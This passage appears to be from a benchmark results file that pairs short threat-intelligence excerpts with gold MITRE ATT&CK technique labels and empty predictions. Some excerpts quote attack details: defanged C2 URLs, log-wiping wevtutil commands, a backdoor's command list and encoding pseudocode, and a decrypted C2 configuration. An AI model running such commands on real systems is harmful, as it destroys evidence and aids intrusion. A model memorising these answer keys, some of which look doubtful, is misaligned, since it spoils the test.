ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: We refer to these attacks as MuddyWater due to the confusion in attributing these attacks. Although the activity was previously linked by others to the FIN7 threat actor group, our research suggests the activity is in fact espionage related and unlikely to be FIN7 related. The MuddyWater attacks are primarily against Middle Eastern nations. However, we have also observed attacks against surrounding nations and beyond, including targets in India and the USA. These attacks have also been tracked by several other researchers on Twitter and elsewhere. The activity has been consistent throughout 2017 and, based on our analysis, targets or is suspected to target, entities in the following countries\n\t - T1027: Obfuscated Files or Information\n\t - T1027: Obfuscated Files or Information\n- Text: EnvyScout contains JavaScript code that can extract an encoded blob from its HTML body and write it to disk.\n\t - T1027.006: Obfuscated Files or Information - HTML Smuggling\n- Text: appends a total of 64MB of garbage data to a file to deter any security products in place that may be scanning files on disk.\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n", "input": "\nNavigating to the web page manually to view:source reveals the code, which at the time of writing happened to not be obfuscated in any significant way", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Confucius has created scheduled tasks to maintain persistence on a compromised host.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: IcedID has used obfuscated VBA string expressions.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: First-stage analysis . When the user opens the phishing email, it presents a Spanish social engineering message (\"Payment: Find scheduled payment dates attached\"). The figure below shows a screenshot of one of the emails we looked at. It decrypts the URL for the second-stage from hardcoded bytes, saves it to the \"Templates\" folder, and executes it. Second-stage analysis . The second-stage executable is packed with a Delphi-based packer. The DLL sets a timer, as shown below, which will execute the downloader function periodically. The DLL decodes the hex string using the following steps: We have written a small Python script to decrypt the third stage. The same decryption method was also used to decrypt the hardcoded command and control (C2).The resulting file is also a DLL, which the second stage reflectively loads. Injected DLL analysis (UAC bypass using two techniques) . It checks if `C:\\Windows\\Finex` exists. Decrypting and executing Lokibot . After attempting to bypass the UAC, the third-stage DLL will check if `AutoRunKeyFlag` is set. For this DLL, it is not set. This dropper uses three stages and three layers of encryption to hide its final payload\n\t - T1053: Scheduled Task/Job\n", "input": "\nhas created scheduled tasks that run a VBScript to execute a payload on victim machines.", "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The original malware scans the list of running process looking for outlook, iexplore or firefox. If found it injects the DLL into the process\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n\t - T1057: Process Discovery\n- Text: StoneDrill has relied on injecting its payload directly into the process memory of the victim's preferred browser.\n\t - T1055: Process Injection\n- Text: GreyEnergy has a module to inject a PE binary into a remote process.\n\t - T1055.002: Process Injection - Portable Executable Injection\n", "input": "\nFakeRun\u2019s PDB string (D:\\Work\\Project\\VS\\house\\Apple\\Apple_20180115\\Release\\FakeRun.pdb) indicates the loader will execute dllhost.exe and inject one malicious DLL file, which is the backdoor, into this process", "gold": "- T1055: Process Injection", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Otherwise, it runs a search for the \u201c/bin/rsyncd\u201d string within the files found in the /etc/ folder\n\t - T1083: File and Directory Discovery\n- Text: The malware also monitors all fixed and removable drives mapped on the local system. Whenever a new drive is inserted, it creates a list of all the files on the drive and stores it encrypted in a file\n\t - T1119: Automated Collection\n- Text: will identify Microsoft Office documents on the victim's computer.\n\t - T1005: Data from Local System\n", "input": "\nsearches through the drive containing the OS, then all drive letters C through to Z, for documents matching certain extensions.", "gold": "- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PyDCrypt has decrypted and dropped the DCSrv payload to disk.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: APT29 has embedded an ISO file within an HTML attachment that contained JavaScript code to initiate malware execution.\n\t - T1027.006: Obfuscated Files or Information - HTML Smuggling\n- Text: In the third phase of the operation, the attackers harvested credentials stored on the compromised machines and performed lateral movement and infected new machines. The attackers also introduced a very rare and stealthy technique to communicate with their servers and exfiltrate data using Microsoft Outlook\n\t - T1027: Obfuscated Files or Information\n", "input": "\ndeobfuscates its code.", "gold": "- T1140: Deobfuscate/Decode Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Naikon has convinced victims to open malicious attachments to execute malware.\n\t - T1204.002: User Execution - Malicious File\n- Text: During Operation Dust Storm, the threat actors used Visual Basic scripts.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: MuddyWater has used a Word Template, Normal.dotm, for persistence.\n\t - T1137.001: Office Application Startup - Office Template Macros\n", "input": "\nWhen macros are enabled and run, the macro within the Word document searches the sections of the document to get the contents of the header using the following piece of code: Set rng = ActiveDocument.Sections(intSection).Headers(1).Range The code above obtains the contents of the header, which the macro will write to a file at C:\\programdata\\Office365DCOMCheck.ps1", "gold": "- T1140: Deobfuscate/Decode Files or Information\n- T1083: File and Directory Discovery\n- T1204: User Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Mori can use Base64 encoded JSON libraries used in C2.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: The generated buffer is encoded using the BASE64 alphabet to be sent in the POST request\n\t - T1132: Data Encoding\n- Text: Cyclops Blink can use a custom binary scheme to encode messages with specific commands and parameters to be executed.\n\t - T1132.002: Data Encoding - Non-Standard Encoding\n", "input": "\ncan use base64 encoded C2 communications.", "gold": "- T1132: Data Encoding", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ZxxZ can download and execute additional files.\n\t - T1105: Ingress Tool Transfer\n- Text: Hydraq creates a backdoor through which remote attackers can load and call DLL functions.\n\t - T1129: Shared Modules\n- Text: five threads are for forwarding collected data to four cloud services (Box, Dropbox, Pcloud and Yandex). When uploading stolen data to a cloud service\n\t - T1102: Web Service\n", "input": "\nhas downloaded and executed additional plugins.", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ChChes communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: HOPLIGHT has connected outbound over TCP port 443 with a FakeTLS method.\n\t - T1571: Non-Standard Port\n- Text: Remsec is capable of using DNS for C2.\n\t - T1071.004: Application Layer Protocol - DNS\n", "input": "\nOne variant connected to its C2 server over port 8080.", "gold": "- T1043: Commonly Used Port", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: performs desktop video recording and captures screenshots of the desktop and sends it to the C2 server.\n\t - T1113: Screen Capture\n- Text: RemoteUtilities can upload and download files to and from a target machine.\n\t - T1105: Ingress Tool Transfer\n- Text: Gamaredon Group has used obfuscated PowerShell scripts for staging.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", "input": "\nA number of commands are provided to the attackers, including the ability to download and execute additional information, upload documents of interest, and take screenshots of the desktop", "gold": "- T1113: Screen Capture\n- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gamaredon Group has attempted to get users to click on Office attachments with malicious macros embedded.\n\t - T1204.002: User Execution - Malicious File\n- Text: Kerrdown has been distributed through malicious e-mail attachments.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: this Excel template was created by a threat actor trying to instill confidence by taking advantage of the DocuSign brand name and image.\n\t - T1137.001: Office Application Startup - Office Template Macros\n\t - T1221: Template Injection\n", "input": "\nCluster A Case 1: Delivery via document property macro \u2013 a789a282e0d65a050cccae66c56632245af1c8a589ace2ca5ca79572289fd483 \u00a0In our research we found at least one attack against a company leveraging a Microsoft Office Excel document with an embedded macro to launch the malware", "gold": "- T1204: User Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: collects information about running processes from victims.\n\t - T1057: Process Discovery\n- Text: The file collection tool used by RainyDay can utilize native API including \"ReadDirectoryChangeW\" for folder monitoring.\n\t - T1106: Native API\n- Text: Successfully checking the loader will execute the dllhost.exe process and create a hardcode mutex to avoid injecting it into the wrong dllhost.exe, as there can be multiple instances of it depending on the number of programs using the Internet Information Services\n\t - T1055: Process Injection\n", "input": "\nFreenki malware lists running processes using the Microsoft Windows API.", "gold": "- T1057: Process Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: gathers the victim's computer name, Windows version, and system language, and then sends it to its C2 server.\n\t - T1082: System Information Discovery\n- Text: In early 2015, a new Emotet modification was released, not all that different from the previous one. Among the changes were: new built-in public RSA key, most strings encrypted, ATS scripts for web injection cleared of comments, targets included clients of Swiss banks.\n\t - T1592.004: Gather Victim Host Information - Client Configurations\n- Text: DanaBot is a modular malware that includes various additional modules; the most popular functionalities of these modules are stealing information from compromised machines and injecting fake forms into popular ecommerce and social media sites to collect payment data. It can also provide full access to infected systems with remote desktop, or mouse and keyboard access by utilizing a VNC plugin.\n\t - T1021.005: Remote Services - VNC\n\t - T1592: Gather Victim Host Information\n", "input": "\ngathers information about the OS architecture, OS name, and OS version/Service pack.", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Wizard Spider has used RDP for lateral movement.\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n- Text: WannaCry enumerates current remote desktop sessions and tries to execute the malware on each session.\n\t - T1563.002: Remote Service Session Hijacking - RDP Hijacking\n", "input": "\nIn addition to using RDP for lateral movement, APT39 has used this protocol to maintain persistence in a victim environment", "gold": "- T1021.001: Remote Services - Remote Desktop Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Pupy has a module to clear event logs with PowerShell.\n\t - T1070.001: Indicator Removal - Clear Windows Event Logs\n- Text: Sandworm Team has disabled event logging on compromised systems.\n\t - T1562.002: Impair Defenses - Disable Windows Event Logging\n- Text: Orz can overwrite Registry settings to reduce its visibility on the victim.\n\t - T1070: Indicator Removal\n", "input": "\nhas cleared event logs, including by using the commands wevtutil cl System and wevtutil cl Security.", "gold": "- T1070: Indicator Removal", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BoomBox has the ability to download next stage malware components to a compromised system.\n\t - T1105: Ingress Tool Transfer\n- Text: this Excel template was created by a threat actor trying to instill confidence by taking advantage of the DocuSign brand name and image.\n\t - T1137.001: Office Application Startup - Office Template Macros\n\t - T1221: Template Injection\n- Text: The RTF file contains macro codes that will execute a PowerShell command to retrieve a dynamic-link library (DLL) file before executing it using odbcconf.exe, a command-line utility related to Microsoft Data Access Components. The DLL will drop and execute a malicious JScript using regsvr32.exe, another command-line utility, to download another JScript and execute it using the same regsvr32.exe. During analysis, we received a PowerShell command that downloads Cobalt Strike from hxxps://5[.]135[.]237[.]216[/]RLxF\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n\t - T1218.008: System Binary Proxy Execution - Odbcconf\n", "input": "\nis capable of downloading a file from a specified URL.", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT41 used \"cmd.exe /c\" to execute commands on remote machines.\nAPT41 used a batch file to install persistence for the Cobalt Strike BEACON loader.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: Other researchers have attributed these attacks to a group known as the Cobalt Gang, which has continued its activities even after the arrest of its alleged leader in Spain this year. AppLocker works well for executables and over time it has also been improved to control various script types, including JScript, PowerShell and VBScript. This has significantly reduced the attack surface and forced attackers, including more sophisticated groups, to find new methods of launching executable code. Payload dropper in an XSL file Another executable used to attempt bypass of the AppLocker feature is msxsl.exe, a Windows utility used to run XSL (eXtensible Stylesheet Language) transformations. Stage 4 \u2014 Downloaders . PowerShell leading to shellcode . The PowerShell chain is launched from an obfuscated JScript scriptlet previously downloaded from the command and control (C2) server and launched using cmstp.exe. JScript downloader . As opposed to PowerShell loading a Cobalt Strike beacon, the other observed infection chain continues using JScript to deliver the final payload, which is a JScript backdoor. The commands are relatively limited, but are sufficient enough to instruct the backdoor to download and execute a new payload, remove itself from the system or download and launch additional scriptlets. Interestingly, if an attack used version 4.4, the attackers decided to add a variable \"researchers\" initialized to the string \"We are not cobalt gang, stop associating us with such skids. Cobalt Strike beacon . On the PowerShell side of the infection chain, the downloaded final payload is a Cobalt Strike beacon, which provides the attacker with rich backdoor functionality. Cobalt Strike is used by penetration testers and offensive security researchers when delivering their services, but it is generally, just as Meterpreter, detected by anti-malware software as it can be easily used by malicious actors\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: After execution, the malware will use the Dropbox API to make an HTTP GET request using HTTPS over TCP port 443 for the files: MD5 Filename d76261ba3b624933a6ebb5dd73758db4 WmiApCom 79b68cdd0044edd4fbf8067b22878644 WmiApCom.bat The \u201cWmiApCom.bat\u201d file is simply used to start \u201cWmiApCom\u201d, which happens to be the exact same file as the one dropped by the malicious Word documents\n\t - T1059: Command and Scripting Interpreter\n\t - T1064: Scripting\n", "input": "\nWe analyzed the command handler and found that it provided the necessary commands for a fully functional backdoor, as seen in Table 1", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Rocke has changed file permissions of files so they could not be modified.\n\t - T1222.002: File and Directory Permissions Modification - Linux and Mac File and Directory Permissions Modification\n", "input": "\nadds the setuid flag to a binary so it can easily elevate in the future.", "gold": "- T1548.001: Abuse Elevation Control Mechanism - Setuid and Setgid", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Saint Bot can deobfuscate strings and files for execution.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Figure 5 shows Phishery\u2019s output to the command that injects a URL into a file named \u201cgood_test.docx\u201d, which it will save the resulting file to \u201cbad_test.docx\u201d\n\t - T1055: Process Injection\n- Text: HIDEDRV injects a DLL for Downdelph into the explorer.exe process.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n", "input": "\ndecrypts and executes shellcode from a file called Stars.jps.", "gold": "- T1140: Deobfuscate/Decode Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The C2 communications begins with a beacon to the following URL: hxxp://www.windowspatch[.]com/khc? If the C2 server wishes to send a command, it will respond to the beacon above by echoing the whoami command results sent by the Trojan to the C2 in the URL\n\t - T1033: System Owner/User Discovery\n\t - T1571: Non-Standard Port\n\t - T1008: Fallback Channels\n\t - T1043: Commonly Used Port\n- Text: PlugX can be configured to use HTTP for command and control.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: It is classified by NTT as a variant of the infamous TrickBot malware, which uses DNS tunneling to stealthily communicate with C2 servers. Though this variant was first discovered in October 2019, there is evidence that Anchor_DNS was used as far back as March 2019\n\t - T1071.004: Application Layer Protocol - DNS\n", "input": "\nSome variants use port 8088 for C2.", "gold": "- T1571: Non-Standard Port", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MarkiRAT can exfiltrate locally stored data via its C2.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: The C2 communications begins with a beacon to the following URL: hxxp://www.windowspatch[.]com/khc? If the C2 server wishes to send a command, it will respond to the beacon above by echoing the whoami command results sent by the Trojan to the C2 in the URL\n\t - T1033: System Owner/User Discovery\n\t - T1571: Non-Standard Port\n\t - T1008: Fallback Channels\n\t - T1043: Commonly Used Port\n- Text: SeaDuke uses HTTP and HTTPS for C2.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nThis version of HALFBAKED connects to the following C2 server: hxxp://198[.]100.119.6:80/cd hxxp://198[.]100.119.6:443/cd hxxp://198[.]100.119.6:8080/cd This version of HALFBAKED listens for the following commands from the C2 server: info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI queries processList: Send list of process running screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1) runvbs: Executes a VB script runexe: Executes EXE file runps1: Executes PowerShell script delete: Delete the specified file update: Update the specified file All communication between the backdoor and attacker C2 are encoded using the following technique, represented in pseudo code: Function send_data(data) \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0random_string = custom_function_to_generate_random_string() \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0encoded_data = URLEncode(SimpleEncrypt(data)) \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0post_data(\"POST\u201d, random_string & \"=\" & encoded_data, Hard_coded_c2_url, Create_Random_Url(class_id)) The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of a variety of topics discussed in this post, including FIN7 and the HALFBAKED backdoor", "gold": "- T1070.004: Indicator Removal - File Deletion\n- T1041: Exfiltration Over C2 Channel", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: DarkWatchman has used Base64 to encode PowerShell commands. DarkWatchman has been delivered as compressed RAR payloads in ZIP files to victims.\n\t - T1027: Obfuscated Files or Information\n- Text: The Trojan will convert these hexadecimal bytes to their binary values and write them to a file and will run the file using the \u201copen\u201d function using the ShellExecuteW API function\n\t - T1106: Native API\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: From October 2012 to May 2014, FireEye observed APT12 utilizing RIPTIDE, a proxy-aware backdoor that communicates via HTTP to a hard-coded command and control (C2) server. RIPTIDE\u2019s first communication with its C2 server fetches an encryption key, and the RC4 encryption key is used to encrypt all further communication\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", "input": "\nEncrypted backdoor configuration Description Decryption Strings Check code MDDEFGEGETGIZ Addr1: tel.qpoe[.]com Addr2: elderscrolls.wikaba[.]com Addr3: tel.qpoe[.]com Port1: 443 Port2: 443 Port3: 53 LoginPasswd: someone HostMark: mark Proxy: 0 Figure 12", "gold": "- T1140: Deobfuscate/Decode Files or Information\n- T1027: Obfuscated Files or Information\n- T1043: Commonly Used Port", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The figure below shows the example of two of several possible command codes. Both create one thread, and each thread is responsible for either downloading and executing the file or running a command line program in the terminal\n\t - T1105: Ingress Tool Transfer\n- Text: The injection function is responsible for resolving all the required API calls. It then opens a handle to the target process by using the OpenProcess API. It uses the SizeOfImage field in the NT header of the DLL to be injected into allocated space into the target process along with a separate space for the init_dll function. The purpose of the init_dll function is to initialize the injected DLL and then pass the control flow to the entry point of the DLL. One thing to note here is a simple CreateRemoteThread method is used to start a thread inside the target process unlike the KernelCallbackTable technique used in our macro\n\t - T1104: Multi-Stage Channels\n- Text: Lastly, the new variant of RogueRobin is capable of using the Google Drive cloud service for its C2 channel, suggesting that DarkHydrus may be shifting to abusing legitimate cloud services for their infrastructure\n\t - T1102: Web Service\n", "input": "\nThe config file provides download instructions for the loader", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The modules are signed by an invalid digital certificates listed as \u201cTencent Technology (Shenzhen) Company Limited\u201d with serial numbers, copied from real Tencent certificates\n\t - T1036.001: Masquerading - Invalid Code Signature\n- Text: Note that .hwp is the extension used by Hangul Word Processor from Hangul Office, which is very popular in South Korea\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: When the shellcode embedded within the malicious EPS is executed, the following three files are dropped: %PROGRAMDATA%\\Microsoft\\DeviceSync\\VMwareCplLauncher.exe %PROGRAMDATA%\\Microsoft\\DeviceSync\\vmtools.dll %PROGRAMDATA%\\Microsoft\\DeviceSync\\MSBuild.exe In the list of dropped files, VMwareCplLauncher.exe is a legitimate, signed VMware executable that serves to ultimately deliver the BADNEWS payload\n\t - T1036: Masquerading\n", "input": "\nstage 1 modules for 64-bit systems have been found to be signed with fake certificates masquerading as originating from Microsoft Corporation and Broadcom Corporation.", "gold": "- T1553.002: Subvert Trust Controls - Code Signing", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 